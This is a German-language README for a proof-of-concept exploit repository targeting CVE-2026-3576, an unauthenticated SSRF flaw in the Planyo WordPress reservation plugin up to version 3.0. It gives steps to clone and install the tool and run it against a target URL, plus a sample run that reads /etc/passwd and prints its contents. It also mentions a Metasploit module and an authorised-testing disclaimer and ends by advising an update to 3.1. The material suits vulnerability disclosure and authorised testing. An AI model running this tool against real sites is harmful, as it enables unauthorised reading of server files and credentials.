
Proof-of-Concept-Exploit für CVE-2026-3576
Dieses Repository enthält einen auf Python basierenden Proof-of-Concept(PoC)-Exploit für CVE-2026-3576. Er ist auch auf Exploit-DB hier zu finden.
Ich habe außerdem ein Metasploit-Modul für diesen Exploit entwickelt, das hier zu finden ist.
Dieses Projekt dient ausschließlich Bildungszwecken und autorisierten Sicherheitstests. Verwenden Sie es nicht gegen Systeme, die Ihnen nicht gehören oder für die Sie keine Testberechtigung haben.
Im Planyo Online Reservation System Plugin für WordPress vor Version 3.1 besteht eine Server-Side-Request-Forgery(SSRF)-Schwachstelle. Sie ermöglicht es einem nicht authentifizierten Angreifer, eine file://-URL über den Parameter ulap_url bereitzustellen, was zu beliebigem Dateizugriff führt.
Eine ausführliche Analyse mit Quellcode-Analyse und Exploit-Demonstration finden Sie in meinem Medium-Blog.
| Komponente | Version |
|---|
| Verwundbares Plugin | <=3.0 |
| Gepatchtes Plugin | 3.1 |
git clone https://github.com/anirbala98/CVE-2026-3576.git
cd CVE-2026-3576/
pip install -r requirements.txt
python exploit.py <base_url> -f <Dateipfad> --disable-check
python exploit.py http://127.0.0.1/wordpress/ -f /etc/passwd
└─$ python exploit.py http://127.0.0.1/wordpress/ -f /etc/passwd
[*] Prüfe, ob das Ziel verwundbar ist...
[+] Version gefunden: 2.9
[+] Ziel ist verwundbar
[*] Versuche, beliebige Datei zu lesen...
root:x:0:0:root:/root:/usr/bin/zsh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
Aktualisieren Sie das Plugin auf Version 3.1.